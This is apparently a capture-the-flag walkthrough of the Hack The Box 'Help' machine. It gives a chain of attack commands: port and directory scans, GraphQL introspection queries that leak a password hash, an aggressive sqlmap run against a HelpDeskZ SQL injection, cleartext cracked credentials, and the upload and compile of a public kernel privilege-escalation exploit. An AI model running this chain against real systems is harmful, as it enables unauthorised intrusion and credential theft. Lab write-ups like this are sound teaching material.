Skip to content

Latest commit

 

History

History
139 lines (74 loc) · 3.23 KB

README.md

File metadata and controls

139 lines (74 loc) · 3.23 KB
Raw

Help

nmap -p- --min-rate 10000 10.10.10.121 -Pn

alt text

After detection of open ports, let's do greater nmap scan for these ports.

nmap -A -sC -sV -p22,80,3000 10.10.10.121

alt text

From nmap scan result, we see that this ip address is resolved into help.htb, let's add this into /etc/hosts file.

First, let's look at port 3000 to see what's happening here.

alt text

From my guess, it is API , let's do directory enumeration for this API to find possible endpoints.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -t 40 -u http://help.htb:3000/

alt text

I see that it is GrapQL api, let's look at documentation of this to find interesting stuff from here.

Tha's called introspection feature of GraphQL.

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq  -c .

alt text

I find User, let's get fields of this.

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .

alt text

Now, it's time to get values of this fields.

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .

alt text

Let's crack this salted password via Crackstation

alt text

helpme@helpme.com: godhelpmeplz

Let's directory enumeration for port 80 to find interesting stuff from here.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 40 -u http://help.htb/

alt text

I found web application on /support endpoint.

alt text

Let's login into this web application via grabbed credentials from GraphQL API.

alt text

Now, let's search publicly known exploit for this version of HelpDeskz software.

alt text

Let's use SQL injection vulnerability (authenticated) which is located on Ticket Attachment feature.

alt text

Let's do this attack via sqlmap tool.

sqlmap -u "http://help.htb/support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6" --level 5 --risk 3 -p param[]

I dump credentials from support database and staff table.

help: Welcome1

That's password of help user on our target machine.

user.txt

alt text

While I run uname -a command to see kernel's version, I see that is vulnerable CVE-2017-16995

alt text

Let's upload this malicous .c file into machine , compile and run.

For uploading, I will use scp command.

scp 44298.c help@help.htb:/tmp

alt text

Let's compile this malicious .c script.

gcc -o exploit 44298.c
./exploit

root.txt

alt text